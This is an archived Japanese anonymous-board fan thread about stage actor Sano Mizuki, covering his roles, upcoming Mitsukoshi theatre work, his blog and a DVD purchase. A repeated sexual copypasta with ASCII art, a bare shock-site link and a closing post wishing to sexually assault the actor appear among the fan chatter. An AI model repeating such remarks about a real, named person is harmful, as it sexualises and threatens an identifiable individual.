224 :ユーは名無しネ:2006/11/07(火) 21:36:54
218の言うこと解る希ガス・・・
主役なんだけど目立ってないっていうか、おいしくないっていうかorz
コミックジャックの時もそう感じた。

フォーティンブラスくらいのハマり役がそろそろ見たい。

>>222 kwsk!

225 :ユーは名無しネ:2006/11/07(火) 22:55:08
>222
情報ありがd!
北村さんとまだお付き合いがあるのが嬉しかった。
状況が目に浮かぶような日記の内容に萌えw

226 :ユーは名無しネ:2006/11/08(水) 01:25:44
>>224
フォーティンブラスこそ、衣装こそ派手だが、あまりおいしくない気がするぞ…

今回のような役が見ていて楽しい。もう一つ何かほしいと思うけど…

227 :ユーは名無しネ:2006/11/08(水) 17:42:04
今回の舞台、自分は萌えだらけだったよ。
おいしい役といえば思い出すのは水色時代のハシモ!
フォーティンブラスはキスシーンやベッドシーンが印象に残ってるけど
ハマリ役かな〜?

228 :ユーは名無しネ:2006/11/08(水) 21:37:05
私も今回の舞台楽しくて好きだった。
もう一つ何かが、という意見もわかるような気もするけどね。

フォーティンブラスは場面的には美味しい所は多いんだけど
どうも、話が好きになれなかった。
西洋文学のパロディというのが伝わりにくいせいもあるかなー?

229 :ユーは名無しネ:2006/11/09(木) 22:30:15
フォーティンブラスは確かに話がイマイチ楽しくない。
やっぱり舞台そのものが楽しいと、見る方も楽しくて好きなんだが。
漫画チックな方が瑞樹には合ってるのかなあ?

230 :ユーは名無しネ:2006/11/09(木) 23:48:14
そういえば、フォーティンブラスの後に瑞樹から葉書きたなー。
大勢に手書きって大変だったろうね。

231 :ユーは名無しネ:2006/11/10(金) 00:21:21
フォーティンブラスは他のキャストも微妙だよね〜?
何より脚本と演出が微妙だよね〜?

232 :ユーは名無しネ:2006/11/10(金) 01:03:13
そうなんだよねー。
場面的にはステキなところが多いんだけど
何回も見たい作品にはどうしてもならない。
初演はけっこう好きだったけど。

233 :ユーは名無しネ:2006/11/10(金) 13:08:03
初演はちっさい会場で出演者が近かったもんね
再演はハムレットが劣化してて痛々しい印象しか残ってない
瑞樹の記憶がないよ・・・

234 :ユーは名無しネ:2006/11/11(土) 02:14:37
あの劇場は印象が強かったなあ。
生みの近くで、地方から出て行った自分には新鮮さだらけだった。
舞台も面白かったしなあ。

235 :ユーは名無しネ:2006/11/11(土) 12:41:39
loo at STAR
って何系の雑誌?

236 :ユーは名無しネ:2006/11/11(土) 18:10:59
>>235
舞台、演劇関係だけど。


237 :ユーは名無しネ:2006/11/12(日) 07:37:51
目の前の便利な箱で調べたらいいのにね。

238 :ユーは名無しネ:2006/11/12(日) 22:06:38
フォーティンブラス嫌いじゃないけどなぁ
何が不満なの?
自分は舞台は何回も見に行くもんとは思っていないから繰り返しみ様とは思わないけど

239 :ユーは名無しネ:2006/11/12(日) 22:17:55
舞台作品としては失敗作に見えた
特に再演
瑞樹が悪いとか、そういう問題ではない

240 :ユーは名無しネ:2006/11/15(水) 22:28:26
>>237
携帯だから。

241 :ユーは名無しネ:2006/11/15(水) 22:35:02
携帯にも検索機能はついてるはずだが?

242 :ユーは名無しネ:2006/11/18(土) 22:35:13
最新のヘタメ
携帯を替えようとか、そんな事正直どうでもいい
仕事をしてる佐野くんのファンなので、仕事の事を語ってホスィ
って今年はもう仕事ないのか…?orzorz

弟のことを、ちゃんづけで呼んでるのはホノボノしたけどねw

243 :ユーは名無しネ:2006/11/19(日) 00:18:44
姿を見たいねえ。佐野ちゃん。

244 :ユーは名無しネ:2006/11/19(日) 06:25:36
庶民的、生活感アリアリの内容だと、なんかリアルであたしは好き



245 :ユーは名無しネ:2006/11/19(日) 14:03:14
今大兄て髪黒い?

246 :ユーは名無しネ:2006/11/19(日) 19:42:41
舞台写真を見直して見ると、ちょっと茶がかってる感じもするけど。
証明のせいもあるかなあ?

247 :ユーは名無しネ:2006/11/24(金) 02:27:46
あそこも黒井?

248 :ユーは名無しネ:2006/11/25(土) 11:42:23
舞台見にいきたい。
三越に出てくれないかな。

249 :ユーは名無しネ:2006/11/25(土) 23:52:30
数年前は、正月に三越って定番だったのにね。
三越舞台って確実に事務所枠だよねw

舞台もいいけど、テレビもね・・・
最近邦画が流行ってるから、映画もいいね。

250 :ユーは名無しネ:2006/11/26(日) 00:42:20
映画(・∀・)イイネ!
でかいスクリーンで観てみたい。

251 :ユーは名無しネ:2006/11/26(日) 11:45:03
>249
正月より秋に三越だったような。

252 :ユーは名無しネ:2006/11/27(月) 22:30:20
今若干暗めのブラウン。
あそこ黒井

253 :ユーは名無しネ:2006/12/03(日) 00:28:48
佐野くんってお酒飲む派かなぁ?

254 :ユーは名無しネ:2006/12/04(月) 15:39:23
お酒は好きじゃないから
付き合いのみだよ

255 :ユーは名無しネ:2006/12/07(木) 00:03:30
>>254
アリガトゴザイマス

256 :ユーは名無しネ:2006/12/07(木) 02:10:55
いえいえw

257 :ユーは名無しネ:2006/12/09(土) 22:45:12
ワンダーボックスDVD発売しますね

通販で購入出来るみたいなんだけど
どこでかったらいいかわかりません

パニッシュのHPみたけどわかりませんでした

すいませんが誰か教えてください

258 :ユーは名無しネ:2006/12/10(日) 00:46:16
[sage]
ネルケプランニングで頼めるよ!
電話すると振込先とか教えてくれるよ。
平日の11時〜18時の間しか繋がらないの。

259 :ユーは名無しネ:2006/12/11(月) 16:37:35
弟のグループの公演の楽日にきてたらしいね

260 :ユーは名無しネ:2006/12/11(月) 22:43:18
早い回答ありがとうございます!

明日さっそく連絡してみます!

261 :ユーは名無しネ:2006/12/12(火) 02:00:54
かまってくれない。

262 :ユーは名無しネ:2006/12/17(日) 00:13:16
auバンザイ!!

263 :ユーは名無しネ:2006/12/19(火) 15:14:19
ソフトバンクやっぱり人気ナシ?


264 :ユーは名無しネ:2006/12/21(木) 07:55:33
17日に佐野くん見たような気がします。

265 :ユーは名無しネ:2006/12/22(金) 01:56:30
>>264
どこで?

今度また見かけたら、次の仕事の予定聞いといて。

266 :ユーは名無しネ:2006/12/25(月) 00:05:23
ほんとにシングルベルなのかしら…

彼女いないのかなぁ?

267 :ユーは名無しネ:2006/12/26(火) 01:11:22
彼氏のほうが似合うよ

268 :ユーは名無しネ:2007/01/02(火) 01:36:50
銀座のコアの前。次のお仕事、三越劇場。

269 :ユーは名無しネ:2007/01/02(火) 09:49:37
>>268
本当ですか?
いつですか?

とりあえず、あけおめ

270 :ユーは名無しネ:2007/01/02(火) 22:36:38
チラシも出てますよ。日にちわすれました。でも、確かです。

271 :ユーは名無しネ:2007/01/04(木) 02:20:35
2月だお
みんな来なくていいからね

272 :ユーは名無しネ:2007/01/04(木) 16:02:44
三越の人情もの舞台の
「さわやか青年」枠は飽きたよー!

273 :ユーは名無しネ:2007/01/06(土) 00:30:58
あけおめメール来るかとおもってたが、こなかったねぇ

残念

274 :ユーは名無しネ:2007/01/06(土) 21:08:52
>>272
何を贅沢なことを
滅多に行けないファンにはごちそうだお

275 :ユーは名無しネ:2007/01/06(土) 22:55:05
そうだよー三越みたいな高級デパートなんて
めったに行けないもんね。

276 :ユーは名無しネ:2007/01/07(日) 18:45:19
瑞樹は三越の食堂でお食事してたりしないのかな?

277 :ユーは名無しネ:2007/01/10(水) 01:08:53
瑞樹は食堂とか好きだから行ってるかもよ!

278 :ユーは名無しネ:2007/01/10(水) 17:26:38
でいつもエビフライと

279 :ユーは名無しネ:2007/01/10(水) 21:51:38
厨が重複スレ立てたよ
どうすんの?

280 :ユーは名無しネ:2007/01/10(水) 22:53:09
弾幕薄いよ
何やってんの?

281 :ユーは名無しネ:2007/01/11(木) 00:18:29
見てきたよ

かかわらないでほっときます

こっちは平和にいきましょうよ

282 :ユーは名無しネ:2007/01/11(木) 08:02:06
どこにあるの?

283 :ユーは名無しネ:2007/01/11(木) 22:12:21
あっち削除依頼出てるね

284 :ユーは名無しネ:2007/01/12(金) 05:29:20
プ

285 :ユーは名無しネ:2007/01/12(金) 18:35:15
しあわせのコピペ

         *'``・* 。
        |     `*。
       ,。∩      *   ぶさもくのちんちん
      + (゜ё`.) *。+゚     おっきくなぁれ〜
      `*。 ヽ、  つ *゚*
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚

このAAを自担スレに貼ると
今年自担に仕事がくるわくるわ
じぬんにお金が入るわ入るわ
とにかくたいへんなことになります

286 :ユーは名無しネ:2007/01/13(土) 19:11:02
しあわせのコピペ

         *'``・* 。
        |     `*。
       ,。∩      *   ぶさもくのちんちん
      + (゜ё`.) *。+゚     おっきくなぁれ〜
      `*。 ヽ、  つ *゚*
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚

このAAを自担スレに貼ると
今年自担に仕事がくるわくるわ
じぬんにお金が入るわ入るわ
とにかくたいへんなことになります


287 :ユーは名無しネ:2007/01/13(土) 20:09:09
しあわせのコピペ

         *'``・* 。
        |     `*。
       ,。∩      *   ぶさもくのちんちん
      + (゜ё`.) *。+゚     おっきくなぁれ〜
      `*。 ヽ、  つ *゚*
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚

このAAを自担スレに貼ると
今年自担に仕事がくるわくるわ
じぬんにお金が入るわ入るわ
とにかくたいへんなことになります


288 :ユーは名無しネ:2007/01/14(日) 21:34:38
今度はどんな役だろう?
出番多いといいな。

289 :ユーは名無しネ:2007/01/22(月) 12:36:16
ペコちゃんのホッペまでも問題アリだったなんて…


いやだわ

290 :ユーは名無しネ:2007/01/22(月) 12:40:05
http://www.zentastic.com/videos/bmevideo-3.wmv



291 :ユーは名無しネ:2007/01/22(月) 16:01:28
俺様の俺ナキに瑞樹ネタあり

292 :ユーは名無しネ:2007/01/23(火) 23:20:30
さっので〜す!ワロス(w

293 :ユーは名無しネ:2007/01/24(水) 23:15:55
ひょっとして12/24のヘタメに書いていた鍋のことだったのかな…?

294 :ユーは名無しネ:2007/01/24(水) 23:23:38
>293
そうかもしれないね
それにしてもイブにW佐野と俺様で鍋って…
健全すぎる(w

295 :ユーは名無しネ:2007/01/28(日) 02:06:20
三越のHP見てきた。
もうちょっと待つけど楽しみだよ。

296 :ユーは名無しネ:2007/01/29(月) 21:43:19
今月のLook at Starに載ってたね!
pnishのページにも小さく載ってたしw

297 :ユーは名無しネ:2007/01/30(火) 22:45:19
見た見た。
かわいいな、お兄ちゃん。

298 :ユーは名無しネ:2007/02/06(火) 22:37:49
昨日初めてようつべの「花嫁は..」で佐野さんを確認しました、名前だけは知ってたんですが
過去スレ全部ロムるほどの体力ないので
Wiki情報補足してくれるエロい人彼の今の状況要約してくれませんか

299 :ユーは名無しネ:2007/02/08(木) 12:46:00
みんな可哀相w
三越まで瑞樹に会えないなんて

300 :ユーは名無しネ:2007/02/08(木) 20:32:05



301 :ユーは名無しネ:2007/02/09(金) 09:39:50


302 :ユーは名無しネ:2007/02/11(日) 10:39:02
お仕事がもっとありますようにl。

303 :ユーは名無しネ:2007/02/12(月) 19:02:23


304 :ユーは名無しネ:2007/02/20(火) 01:24:34
瑞樹ちゃんを犯せますように

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)